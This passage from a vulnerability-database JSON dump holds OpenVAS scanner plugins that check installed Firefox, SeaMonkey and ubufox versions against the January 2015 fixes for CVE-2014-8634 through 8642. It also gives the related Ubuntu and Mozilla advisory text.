exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"35.0+build3-0ubuntu0.12.04.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:32", "description": "This host is installed with SeaMonkey and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "SeaMonkey Multiple Vulnerabilities-01 Jan15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805254", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805254", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sea_monkey_mult_vuln01_jan15_win.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# SeaMonkey Multiple Vulnerabilities-01 Jan15 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:seamonkey\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805254\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-8642\", \"CVE-2014-8641\", \"CVE-2014-8640\", \"CVE-2014-8639\",\n \"CVE-2014-8638\", \"CVE-2014-8637\", \"CVE-2014-8636\", \"CVE-2014-8635\",\n \"CVE-2014-8634\");\n script_bugtraq_id(72042, 72044, 72045, 72046, 72047, 72048, 72041, 72050, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 14:51:45 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"SeaMonkey Multiple Vulnerabilities-01 Jan15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with SeaMonkey and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Some unspecified errors.\n\n - An error when rendering a bitmap image by the bitmap decoder within a\n canvas element.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - A use-after-free error when handling tracks within WebRTC.\n\n - An error when handling the 'id-pkix-ocsp-nocheck' extension during\n verification of a delegated OCSP (Online Certificate Status Protocol) response\n signing certificate.\n\n - An error when handling DOM (Document Object Model) objects with certain\n properties.\n\n - Improper restriction of timeline operations by the\n 'mozilla::dom::AudioParamTimeline::AudioNodeInputValue' function in the Web\n Audio API.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"SeaMonkey version before 2.32 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to SeaMonkey version 2.32 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_seamonkey_detect_win.nasl\");\n script_mandatory_keys(\"Seamonkey/Win/Ver\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/seamonkey\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!smVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:smVer, test_version:\"2.32\"))\n{\n fix = \"2.32\";\n report = 'Installed version: ' + smVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-23T00:00:00", "type": "openvas", "title": "Ubuntu Update for ubufox USN-2458-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842060", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for ubufox USN-2458-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842060\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-23 12:58:49 +0100 (Fri, 23 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\",\n \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\",\n \"CVE-2014-8642\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for ubufox USN-2458-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ubufox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-2458-1 fixed vulnerabilities in Firefox.\nThis update provides the corresponding version of Ubufox.\n\nOriginal advisory details:\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse\nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered\nmultiple memory safety issues in Firefox. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthese to cause a denial of service via application crash, or execute\narbitrary code with the privileges of the user invoking Firefox.\n(CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties\ncan bypass XrayWrappers in some circumstances. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering\nmalformed bitmap images on a canvas element. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon()\nlack an origin header. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit this to conduct\ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response\ncould inject cookies in to the originally requested domain. If a user\nconnected to a malicious web proxy, an attacker could potentially exploit\nthis to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating\ntimelines. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash, or execute arbitrary code with the privileges of the user invoking\nFirefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed\nby a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck\nextension, potentially allowing a user to connect to a site with a revoked\ncertificate. (CVE-2014-8642)\");\n script_tag(name:\"affected\", value:\"ubufox on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2458-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2458-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xul-ext-ubufox\", ver:\"3.0-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xul-ext-ubufox\", ver:\"3.0-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"xul-ext-ubufox\", ver:\"3.0-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-01-28T00:00:00", "type": "openvas", "title": "Ubuntu Update for firefox USN-2458-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842079", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842079", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for firefox USN-2458-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842079\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-28 06:11:29 +0100 (Wed, 28 Jan 2015)\");\n script_cve_id(\"CVE-2014-8634\", \"CVE-2014-8635\", \"CVE-2014-8636\", \"CVE-2014-8637\",\n \"CVE-2014-8638\", \"CVE-2014-8639\", \"CVE-2014-8640\", \"CVE-2014-8641\",\n \"CVE-2014-8642\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for firefox USN-2458-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-2458-1 fixed vulnerabilities in Firefox.\nThis update introduced a regression which could make websites that use CSP fail to\nload under some circumstances. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nChristian Holler, Patrick McManus, Christoph Diehl, Gary Kwong, Jesse\nRuderman, Byron Campen, Terrence Cole, and Nils Ohlmeier discovered\nmultiple memory safety issues in Firefox. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially exploit\nthese to cause a denial of service via application crash, or execute\narbitrary code with the privileges of the user invoking Firefox.\n(CVE-2014-8634, CVE-2014-8635)\n\nBobby Holley discovered that some DOM objects with certain properties\ncan bypass XrayWrappers in some circumstances. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to bypass security restrictions. (CVE-2014-8636)\n\nMichal Zalewski discovered a use of uninitialized memory when rendering\nmalformed bitmap images on a canvas element. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to steal confidential information. (CVE-2014-8637)\n\nMuneaki Nishimura discovered that requests from navigator.sendBeacon()\nlack an origin header. If a user were tricked in to opening a specially\ncrafted website, an attacker could potentially exploit this to conduct\ncross-site request forgery (XSRF) attacks. (CVE-2014-8638)\n\nXiaofeng Zheng discovered that a web proxy returning a 407 response\ncould inject cookies in to the originally requested domain. If a user\nconnected to a malicious web proxy, an attacker could potentially exploit\nthis to conduct session-fixation attacks. (CVE-2014-8639)\n\nHolger Fuhrmannek discovered a crash in Web Audio while manipulating\ntimelines. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial\nof service. (CVE-2014-8640)\n\nMitchell Harper discovered a use-after-free in WebRTC. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit this to cause a denial of service via application\ncrash, or execute arbitrary code with the privileges of the user invoking\nFirefox. (CVE-2014-8641)\n\nBrian Smith discovered that OCSP responses would fail to verify if signed\nby a delegated OCSP responder certificate with the id-pkix-ocsp-nocheck\nextension, potentially allowing a user to connect to a site with a revoked\ncertificate. (CVE-2014-8642)\");\n script_tag(name:\"affected\", value:\"firefox on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2458-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2458-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"35.0.1+build1-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"35.0.1+build1-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"firefox\", ver:\"35.0.1+build1-0ubuntu0.12.04.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:34", "description": "This host is installed with SeaMonkey and\n is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "SeaMonkey Multiple Vulnerabilities-01 Jan15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2018-10-12T00:00:00", "id": "OPENVAS:1361412562310805255", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805255", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sea_monkey_mult_vuln01_jan15_macosx.nasl 11872 2018-10-12 11:22:41Z cfischer $\n#\n# SeaMonkey Multiple Vulnerabilities-01 Jan15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:seamonkey\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805255\");\n script_version(\"$Revision: 11872 $\");\n script_cve_id(\"CVE-2014-8642\", \"CVE-2014-8641\", \"CVE-2014-8640\", \"CVE-2014-8639\",\n \"CVE-2014-8638\", \"CVE-2014-8637\", \"CVE-2014-8636\", \"CVE-2014-8635\",\n \"CVE-2014-8634\");\n script_bugtraq_id(72042, 72044, 72045, 72046, 72047, 72048, 72041, 72050, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 13:22:41 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 14:41:18 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"SeaMonkey Multiple Vulnerabilities-01 Jan15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with SeaMonkey and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Some unspecified errors.\n\n - An error when rendering a bitmap image by the bitmap decoder within a\n canvas element.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - A use-after-free error when handling tracks within WebRTC.\n\n - An error when handling the 'id-pkix-ocsp-nocheck' extension during\n verification of a delegated OCSP (Online Certificate Status Protocol) response\n signing certificate.\n\n - An error when handling DOM (Document Object Model) objects with certain\n properties.\n\n - Improper restriction of timeline operations by the\n 'mozilla::dom::AudioParamTimeline::AudioNodeInputValue' function in the Web\n Audio API.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"SeaMonkey version before 2.32 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to SeaMonkey version 2.32 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"SeaMonkey/MacOSX/Version\");\n script_xref(name:\"URL\", value:\"http://www.mozilla.com/en-US/seamonkey\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!smVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:smVer, test_version:\"2.32\"))\n{\n fix = \"2.32\";\n report = 'Installed version: ' + smVer + '\\n' +\n 'Fixed version: ' + fix + '\\n';\n security_message(data:report );\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:52", "description": "This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-01-20T00:00:00", "type": "openvas", "title": "Mozilla Firefox Multiple Vulnerabilities-01 Jan15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805249", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805249", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Mozilla Firefox Multiple Vulnerabilities-01 Jan15 (Mac OS X)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:mozilla:firefox\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805249\");\n script_version(\"2019-07-17T11:14:11+0000\");\n script_cve_id(\"CVE-2014-8642\", \"CVE-2014-8641\", \"CVE-2014-8640\", \"CVE-2014-8639\",\n \"CVE-2014-8638\", \"CVE-2014-8637\", \"CVE-2014-8636\", \"CVE-2014-8635\",\n \"CVE-2014-8634\");\n script_bugtraq_id(72042, 72044, 72045, 72046, 72047, 72048, 72041, 72050, 72049);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 11:14:11 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-01-20 13:12:05 +0530 (Tue, 20 Jan 2015)\");\n script_name(\"Mozilla Firefox Multiple Vulnerabilities-01 Jan15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla Firefox\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Some unspecified errors.\n\n - An error when rendering a bitmap image by the bitmap decoder within a\n canvas element.\n\n - An error when handling a request from 'navigator.sendBeacon' API interface\n function.\n\n - An error when handling a '407 Proxy Authentication' response with a\n 'Set-Cookie' header from a web proxy.\n\n - A use-after-free error when handling tracks within WebRTC.\n\n - An error when handling the 'id-pkix-ocsp-nocheck' extension during\n verification of a delegated OCSP (Online Certificate Status Protocol) response\n signing certificate.\n\n - An error when handling DOM (Document Object Model) objects with certain\n properties.\n\n - Improper restriction of timeline operations by the\n 'mozilla::dom::AudioParamTimeline::AudioNodeInputValue' function in the Web\n Audio API.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to disclose potentially sensitive information, bypass certain security\n restrictions, and compromise a user's system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox before version 35.0 on Mac OS X\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox version 35.0\n or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/62253\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-01\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-03\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-04\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-02\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-05\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-09\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-08\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2015-06\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox/MacOSX/Version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ffVer = 